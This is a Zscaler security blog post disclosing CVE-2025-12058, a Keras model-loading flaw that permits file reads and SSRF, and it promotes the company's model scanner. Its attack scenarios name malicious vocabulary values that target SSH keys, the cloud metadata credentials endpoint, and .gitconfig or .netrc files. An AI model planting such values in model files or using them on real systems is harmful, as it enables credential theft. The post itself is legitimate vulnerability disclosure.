Blog de Zscaler

Reciba en su bandeja de entrada las últimas actualizaciones del blog de Zscaler

Zscaler Discovers Vulnerability in Keras Models Allowing Arbitrary File Access and SSRF (CVE-2025-12058)

JAY CHAUHAN - Senior Product Manager—Cloud Threat & Research

noviembre 04, 2025 - 7 Min de lectura

Stop Cyberattacks

Contenido

Summary
Key Takeaways
Overview
Technical Analysis of CVE-2025-12058
Real-World Impact Scenarios
How Zscaler Discovered CVE-2025-12058
Detection and Prevention with Zscaler AI Security Posture Management (AISPM)
Disclosure Timeline
Conclusion
Más blogs

Summary

Zscaler uncovered a vulnerability in Keras that exposed AI and machine learning environments to file access and network exploitation risks, highlighting the urgent need to secure the AI model supply chain. Through responsible disclosure and ongoing research, Zscaler helps enterprises stay protected from emerging AI threats with a Zero Trust approach.

Key Takeaways

Technical analysis of CVE-2025-12058. The Keras model vulnerability root cause analysis, attack vectors, and disclosure details.

AI models increasingly introduce new security risks. Even trusted frameworks can contain flaws that expose data or systems and become attack vectors.
Research and disclosure make AI safer. Transparent information sharing of CVEs and other key discoveries is a critical safety component across the open-source and security communities.
Securing the AI supply chain is essential. Enterprises must verify the integrity of models, code, and data sources to prevent compromise through AI.
Zero Trust principles extend to AI. The same verification principles that protect users and apps also apply to AI.
Zscaler is leading in AI security. Our research and technology help organizations embrace transformation and use AI safely.

Overview

Keras Model - Arbitrary File Access and Server-Side Request Forgery

Zscaler identified a vulnerability in Keras 3.11.3 and earlier that allows arbitrary file access and potential Server-Side Request Forgery (SSRF) when loading malicious .keras model files.
The flaw exists in the StringLookup and IndexLookup preprocessing layers, which permit file paths or URLs in their vocabulary parameter. When loading a serialized model (.keras file), Keras reconstructs these layers and accesses the referenced paths during deserialization - even with safe_mode=True enabled.

This behavior bypasses user expectations of "safe" deserialization and can lead to:

Arbitrary local file read (e.g., /etc/passwd, SSH keys, credentials)
Server-Side Request Forgery (SSRF) when network schemes are supported
Information disclosure via vocabulary exfiltration

Zscaler responsibly disclosed the issue to the Keras development team. The vulnerability is tracked as CVE-2025-12058 with a CVSS score of 5.9 (Medium) and was fixed in Keras version 3.11.4.

Technical Analysis of CVE-2025-12058

The vulnerability stems from how Keras handles model reconstruction during loading. Preprocessing layers (StringLookup and IndexLookup) allow file paths or URLs to be passed as input to define their vocabularies. When a .keras model is deserialized, these paths are automatically opened and read by TensorFlow’s file I/O system without proper validation or restriction. This means that even when security features like safe_mode are enabled, a malicious model can still instruct Keras to access local files or external URLs during load time, exposing sensitive data or enabling remote network requests.

Affected Components

Layers: keras.layers, StringLookup, keras.layers, IndexLookup, potentially IntegerLookup
Versions: Keras 3.11.3 (and likely earlier 3.x versions)
Backend: Confirmed with TensorFlow backend 2.20.0
Default Settings: Reproduces with safe_mode=True, no custom objects required

Root Cause

The StringLookup and IndexLookup layers accept a vocabulary parameter that can be either:

An inline list/array of tokens
A string path to a vocabulary file

During model deserialization, if the vocabulary is a string path, Keras uses TensorFlow's tf.io.gfile APIs to read the file. This filesystem API supports:

Absolute local paths (e.g., /etc/passwd)
file:// URLs
Network URLs (http://, https://) when TensorFlow-IO is present

Critical Issue: safe_mode=True guards against unsafe callable deserialization but does not restrict I/O operations performed by built-in layers during reconstruction.

Real-World Impact Scenarios

ML Model Hub Compromise

Attackers upload a malicious .keras model to a public repository (e.g., Hugging Face, Kaggle).
When a victim downloads and loads the model, SSH private keys or local configuration files may be exposed.

Attack vector:

Attacker uploads a malicious .keras model file to the public repository
The model's StringLookup layer is configured with vocabulary="/home/victim/.ssh/id_rsa"
Victim downloads and loads the model for evaluation or fine-tuning
SSH private key contents are read into the model's vocabulary during deserialization
Attacker retrieves the key by re-downloading the model or through vocabulary exfiltration

Potential impact: complete compromise of victim's SSH access to servers, code repositories, and cloud infrastructure. Attackers can pivot to active intrusion: clone private repos, inject backdoors or malicious commits into CI/CD, execute code in production, and move laterally.

Cloud Credential Theft

ML engineers deploying models in AWS/GCP/Azure environments with instance metadata services. Malicious model references metadata endpoints (e.g., http://169.254.169.254/) so loading it in a cloud VM/container returns IAM credentials.

Attack vector:

Attacker crafts a model with vocabulary="http://169.254.169.254/latest/meta-data/iam/security-credentials/role-name"
Model is loaded in a cloud VM or container with IAM role attached
AWS credentials (access key, secret key, session token) are fetched at load time
Credentials populate the vocabulary and can be exfiltrated via get_vocabulary()

Potential impact: Full access to cloud resources under the compromised role. Attackers can take over infrastructure, exfiltrate data, deploy ransomware or crypto mining, erase logs, and pivot access across accounts.

Supply Chain Attack via Pre-trained Models

Attacker publishes or poisons a popular pre-trained model that references local credential files (.gitconfig, .netrc) so CI/CD or developer machines leak tokens when the model is loaded. Development teams using third-party pre-trained models for transfer learning may import these models and expose Git tokens, API keys, and source code.

Attack vector:

Attacker compromises a popular pre-trained model repository or creates a malicious "state-of-the-art" model
Model contains StringLookup with vocabulary="file:///home/developer/.gitconfig" or "file:///home/developer/.netrc"
Developers load the model in CI/CD pipelines or local development environments
Git credentials, authentication tokens, and repository access details are extracted
Attacker gains access to private source code repositories

Potential impact: Stolen dev credentials enable source code/IP theft and insertion of malicious code and backdoors into builds and signed artifacts. Backdoor releases can propagate downstream to customers and partners, triggering widespread compromise.

How Zscaler Discovered CVE-2025-12058

This vulnerability was discovered during Zscaler's ongoing security research into AI/ML framework security and model supply chain risks. While analyzing Keras preprocessing layers, researchers observed that certain deserialization routines allowed file operations to execute before security controls were applied. Further analysis revealed that TensorFlow’s file handling APIs could access both local and remote resources through path references embedded in model files. This discovery highlights how even seemingly safe model loading mechanisms can expose enterprise systems to data exfiltration or SSRF attacks when handling untrusted AI models.

Discovery: Investigation of the StringLookup and IndexLookup layers accept a vocabulary parameter that can be either an inline list or a file path.

Deep inspection of the deserialization code revealed that:

File paths in the vocabulary parameter are resolved using TensorFlow's tf.io.gfile API during model loading.
This file access occurs before any safe_mode checks on custom objects.
The API supports not just local paths but also file:// URLs and network schemes.

As enterprises increasingly adopt AI/ML technologies, Zscaler remains dedicated to identifying and mitigating security risks before they can be exploited in production environments.

Detection and Prevention with Zscaler AI Security Posture Management (AISPM)

Zscaler’s AI Security Posture Management (AISPM) solution provides protection against malicious or compromised AI models before deployment. This enterprise-grade security platform automatically detects CVE-2025-12058 and similar vulnerabilities in real-time.

Its Model Scanning Engine performs:

Deep inspection of ML model files (Keras, PyTorch, TensorFlow, ONNX)
Static analysis to detect suspicious paths and network references
Identification of SSRF or arbitrary file access vectors
Binary-level inspection for embedded payloads.

The example below shows Zscaler AISPM detecting the Keras Vocabulary Injection vulnerability in a model file:

Zscaler AISPM enables organizations to secure their AI supply chain by preventing malicious models from infiltrating development and production environments, providing complete visibility into AI security risks across the enterprise.

Disclosure Timeline

Sept 26, 2025 - Vulnerability reported to Keras team

Oct 14, 2025 - Vendor confirmed reproduction

Oct 20, 2025 - Fix released

Oct 22, 2025 - CVE-2025-12058 assigned

Conclusion

As enterprises increasingly integrate AI/ML technologies, securing the model supply chain becomes essential.

Zscaler remains dedicated to identifying and mitigating security risks before they can be exploited in production environments, advancing trust in the evolving AI ecosystem.

References:

CVE-2025-12058 with a CVSS score of 5.9 (Medium) CVSS 4.0: AV:A/AC:H/AT:P/PR:L/UI:P/VC:H/VI:L/VA:L/SC:H/SI:L/SA:L
Keras Fix PR for version 3.11.4
GitHub Advisory

Learn More

To explore the broader landscape of AI-driven threats and how to secure against these real-world attacks, read the Zscaler ThreatLabz 2025 AI Security Report.

Gracias por leer

¿Este post ha sido útil?

Sí, ¡Muy útil!

La verdad, no

Exención de responsabilidad: Este blog post ha sido creado por Zscaler con fines informativos exclusivamente y se ofrece "como es" sin ninguna garantía de precisión, integridad o fiabilidad. Zscaler no asume responsabilidad alguna por cualesquiera errores u omisiones ni por ninguna acción emprendida en base a la información suministrada. Cualesquiera sitios web de terceros o recursos vinculados a este blog se suministran exclusivamente por conveniencia y Zscaler no se hace responsable de su contenido o sus prácticas. Todo el contenido es susceptible a cambio sin previo aviso. Al acceder a este blog, usted acepta estas condiciones y reconoce su responsabilidad exclusiva de verificar y utilizar la información según sea precisa para sus necesidades.

Explorar más blogs de Zscaler

illuminated woman touching digital screen

AI in the Enterprise: Key Findings from the ThreatLabz 2025 AI Security Report

Leer el blog

illuminated man code and monitor reflected in glasses

Under the Radar: How Non-Web Protocols Are Redefining the Attack Surface

Leer el blog

A digital background with CVE-2025-24813 text.

CVE-2025-24813: Apache Tomcat Vulnerable to RCE Attacks

Leer el blog

Reciba en su bandeja de entrada las últimas actualizaciones del blog de Zscaler

Al enviar el formulario, acepta nuestra política de privacidad.